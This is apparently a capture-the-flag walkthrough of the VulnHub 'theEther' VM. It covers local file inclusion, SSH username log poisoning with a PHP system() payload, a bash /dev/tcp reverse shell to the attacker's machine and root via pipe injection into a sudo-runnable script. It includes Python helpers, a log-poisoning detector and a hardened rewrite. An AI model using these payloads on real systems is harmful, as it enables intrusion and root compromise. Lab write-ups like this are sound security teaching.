Recently a friend sent me a boot2root VM, saying he had run into a small problem with log injection and asking me to help. After downloading it I found the machine quite good; it has a few tricks in it, so I wrote it up as an article. Anyone interested can try it themselves.
VM download
https://www.vulnhub.com/entry...
Information gathering
First scan the local network to find the target's IP:
arp-scan -l
Scan the target IP with nmap:
nmap -sV -A -T4 192.168.1.20
Ports 22 and 80 are open, running SSH and HTTP respectively.
Open the site over HTTP:
http://192.168.1.20/
Browsing the site turns up three things:
· The site has a URL of the following form that is vulnerable to LFI (local file inclusion):
http://192.168.1.20/index.php...
· The About Us page contains an email address, which is very likely a username used somewhere
· The RESEARCH page contains a lot of words that can be used to build a wordlist if needed
Exploitation
Trying the usual paths turned up nothing, so I took the LFI-JHADDIX.txt file from SecLists on GitHub and ran it through Burp Suite's Intruder, which finally found a readable path (SecLists has other files too, worth a look):
https://github.com/danielmies... (under the Fuzzing directory)
Capture the request, then right-click and send it to Intruder.
Set the payload list.
A few of the results have responses that differ from the rest; try each of them:
/var/log/lastlog can be read, but contains nothing useful
/var/run/utmp contains nothing useful either
/var/log/auth.log redirects back to the home page (note this URL)
Below are the results of including the other files.
Being redirected to the home page when reading /var/log/auth.log suggests something is being hidden, so look at the response packet.
Click HTTP history, find the request just sent and click Response: the returned data really does contain the log.
curl can be used to request it as well:
curl -is http://192.168.1.20/?file=/va...
Note: take a snapshot before the following steps. If the injection does not lead to command execution after a reasonable time, restore the snapshot; likewise, as soon as the curl command starts returning nothing, restore the snapshot and start over. The reason is that a malformed payload, once written into auth.log, breaks every later include of that file with a PHP parse error, and it cannot be removed from the log without a shell on the box.
To test further, I logged in over SSH and read the log again; the SSH activity shows up in the log.
Since SSH activity is written to the log, we can try log injection combined with file inclusion to execute arbitrary commands.
Try injecting a PHP snippet:
ssh '<?php system($_GET[cmd]);?>'@192.168.1.20 (single quotes are required, because in double quotes the shell would expand $_GET; and there must be no space between ? and php)
Read the latest log entries:
curl -is 'http://192.168.1.20/index.php...'
The username no longer appears in the output: the PHP tag was interpreted rather than printed, which shows the injection worked.
Try running ls through the injected PHP:
curl -is 'http://192.168.1.20/index.php...'
There is a Python script named xxxlogauditorxxx.py in that directory.
Now that we have arbitrary command execution, let's try to get a more stable shell by spawning a reverse shell.
Reverse shell methods for various environments are collected on this site:
http://www.zerokeeper.com/exp...
First start a listener:
nc -nlvp 9999
Try:
curl -is 'http://192.168.1.20/index.php... bash -i >& /dev/tcp/192.168.1.66/9999 0>&1'
The error shows that the payload must be URL-encoded before it is recognised.
After encoding:
curl -is 'http://192.168.1.20/index.php...'
No shell came back.
The simplest method, nc with -e, did not work either.
Next try a variant that does not need -e:
curl -is 'http://192.168.1.20/index.php...'
Reverse shell obtained.
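Bringing the steps above together, here is an added Python example (not code from the original post or the target machine) with the two commands as functions plus, for the defender's side, a scan of sshd log lines for a poisoned username. It assumes the inclusion page is index.php with a file parameter (the curl command earlier uses ?file=), a cmd parameter as in the payload, and auth.log lines constructed here in the usual OpenSSH "Invalid user X from IP" format.

```python
"""Log poisoning via sshd + LFI: payload building and log-side detection.
Added example; parameter names and the sample log are assumptions."""
import re
import shlex
from urllib.parse import quote

TARGET = "192.168.1.20"
LFI_BASE = f"http://{TARGET}/index.php"      # assumed: LFI page with a 'file' parameter
LOG_PATH = "/var/log/auth.log"
PHP_PAYLOAD = "<?php system($_GET[cmd]);?>"  # the one-liner used on the page


def build_ssh_injection(target: str = TARGET, payload: str = PHP_PAYLOAD) -> str:
    """ssh command whose *username* is the PHP payload. shlex.quote wraps the
    whole user@host in single quotes, so the shell never expands $_GET
    (double quotes would turn it into an empty string)."""
    return "ssh " + shlex.quote(f"{payload}@{target}")


def build_lfi_url(cmd: str, base: str = LFI_BASE, log: str = LOG_PATH) -> str:
    """URL that includes the poisoned log and hands cmd to system().
    quote(..., safe='') encodes space, '>', '&' and '/' so a reverse-shell
    one-liner survives as a single query parameter value."""
    return f"{base}?file={log}&cmd={quote(cmd, safe='')}"


# Defender's side: sshd logs the attempted username verbatim, so an interpreter
# tag in that field is a direct indicator of log poisoning.
SSHD_INVALID_USER = re.compile(
    r"sshd\[\d+\]: .*?[Ii]nvalid user (?P<user>.+?) from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
PHP_TAG = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)


def find_poisoned_entries(log_text: str) -> list:
    """Returns (username, source_ip) for every sshd line whose username
    contains a PHP open tag."""
    hits = []
    for line in log_text.splitlines():
        m = SSHD_INVALID_USER.search(line)
        if m and PHP_TAG.search(m.group("user")):
            hits.append((m.group("user"), m.group("ip")))
    return hits


# Constructed sample of what auth.log looks like after the injection attempt.
SAMPLE_AUTH_LOG = """\
Oct 13 10:01:12 theEther sshd[1182]: Invalid user <?php system($_GET[cmd]);?> from 192.168.1.66 port 51234
Oct 13 10:01:14 theEther sshd[1182]: Failed password for invalid user <?php system($_GET[cmd]);?> from 192.168.1.66 port 51234 ssh2
Oct 13 10:02:30 theEther sshd[1190]: Accepted password for alice from 192.168.1.10 port 51300 ssh2
"""

if __name__ == "__main__":
    print(build_ssh_injection())
    print(build_lfi_url("ls"))
    print(build_lfi_url("bash -i >& /dev/tcp/192.168.1.66/9999 0>&1"))
    for user, ip in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"poisoned username {user!r} from {ip}")
```

Run it as a script to print both commands and the detections. The detection half is the takeaway for a blue team: the username field of sshd's "Invalid user" and "Failed password for invalid user" lines is attacker-controlled, so anything that looks like `<?php` (or any other interpreter tag) there should alert, whether or not the web tier actually includes the log.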
Privilege escalation
Check the current user.
Use sudo -l to see what we are allowed to run.
xxxlogauditorxxx.py can be run with sudo without a password.
Look at the file.
It is a very long Python script, a large part of which is base64-encoded.
Try running the script.
The script lets us execute commands: when we enter /var/log/auth.log | id, the id command runs as root.
So we can pair the script with /var/log/auth.log | to run any command as root.
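The post does not reproduce the script, so the following is an added Python reconstruction of the pattern that makes `/var/log/auth.log | id` run as root, not the script's actual code: a log path concatenated into a shell command string, shown beside a hardened version that resolves the path, checks it against an allowlist and runs cat as an argv list with no shell in between. Because sudo NOPASSWD puts a root shell in front of the string, everything after the pipe runs as root. The temp file, its contents and the echo stand-in for id are constructed for the demo.

```python
"""Command injection through a 'log auditor' that hands a path to a shell.
Added example: an assumed reconstruction of the pattern, not the target
script's own code."""
import os
import subprocess
import tempfile


def read_log_vulnerable(path: str) -> str:
    """Concatenates the user-supplied path into a shell command.
    With sudo NOPASSWD in front, '/var/log/auth.log | id' runs id as root."""
    result = subprocess.run("cat " + path, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def read_log_hardened(path: str, allowed: frozenset) -> str:
    """Resolves symlinks and '..', requires the result to be on an allowlist,
    and runs cat as an argv list so no shell ever parses the input."""
    real = os.path.realpath(path)
    if real not in allowed:
        raise ValueError(f"refusing to read {path!r}: not an allowed log file")
    result = subprocess.run(["cat", real], check=True,
                            capture_output=True, text=True)
    return result.stdout


def demo() -> dict:
    """Runs both versions against a constructed auth.log and the page's trick."""
    with tempfile.TemporaryDirectory() as tmp:
        log = os.path.join(tmp, "auth.log")
        with open(log, "w") as fh:
            fh.write("Oct 13 10:02:30 theEther sshd[1190]: "
                     "Accepted password for alice from 192.168.1.10 port 51300 ssh2\n")
        allowed = frozenset({os.path.realpath(log)})
        # 'echo INJECTED' stands in for 'id': everything after the pipe executes
        injected = log + " | echo INJECTED"

        vulnerable_output = read_log_vulnerable(injected)
        try:
            read_log_hardened(injected, allowed)
            hardened_blocked = False
        except ValueError:
            hardened_blocked = True
        legit_output = read_log_hardened(log, allowed)

    return {
        "vulnerable_output": vulnerable_output.strip(),  # "INJECTED"
        "hardened_blocked": hardened_blocked,            # True
        "legit_output": legit_output,                    # the log line itself
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The allowlist matters more than dropping shell=True on its own: with an argv list but no path check, `cat` is still read-as-root for any file the caller names, which is the /root/flag.png read from the next step by another route.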
In /root there is a file flag.png:
/var/log/auth.log | ls /root
Copy it to the public web directory, then download it with wget:
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png
wget http://192.168.1.20/?file=fla...
Opening it shows this image.
Looking at it with cat shows lots of garbage plus a base64-encoded section.
The content after flag is base64-encoded; this should be what we are looking for.
Decoding that text gives the following. That's right! It's great!
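As an added example (not from the original post), the Python below carves the base64 run that follows a "flag" marker out of a binary and decodes it, repairing missing "=" padding on the way. The real layout of flag.png is only described on the page, so the sample file here is constructed: a PNG signature, junk bytes, the marker, the encoded text and more junk.

```python
"""Carve a base64 blob that follows a 'flag' marker inside a binary file.
Added example; the sample 'flag.png' below is constructed."""
import base64
import re

# 'flag', optional separator bytes, then a run of base64 characters plus padding.
FLAG_BLOB = re.compile(rb"flag[^A-Za-z0-9+/=]*([A-Za-z0-9+/]{16,}={0,2})")


def extract_after_flag(data: bytes) -> str:
    """Returns the decoded text of the first base64 run after 'flag'."""
    m = FLAG_BLOB.search(data)
    if m is None:
        raise ValueError("no base64 run found after a 'flag' marker")
    blob = m.group(1)
    blob += b"=" * (-len(blob) % 4)   # restore any missing '=' padding
    return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")


def make_sample(note: bytes, strip_padding: bool = False) -> bytes:
    """Constructed stand-in for flag.png: PNG signature, junk, 'flag', base64, junk."""
    encoded = base64.b64encode(note)
    if strip_padding:
        encoded = encoded.rstrip(b"=")
    return b"\x89PNG\r\n\x1a\n" + bytes(range(256)) + b"flag" + encoded + b"\x00\xff"


if __name__ == "__main__":
    sample = make_sample(b"October 1, 2017. We have our first batch of volunteers.")
    print(extract_after_flag(sample))
```

The regex restricts the run to the standard base64 alphabet and requires at least 16 characters, which keeps short alphanumeric coincidences in the surrounding binary from being mistaken for the blob; `validate=True` makes b64decode reject anything that slipped through.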
October 1, 2017.
We have our first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!
October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.
October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.
October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.
October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.
October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.
October 10, 2017.
Isolated and exposed subjects are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.
October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.
October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous deaths due to the subjects displaying extreme reactions to the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial law in the event of an outbreak to the general population.
--Document scheduled to be shredded on October 15th after PSA.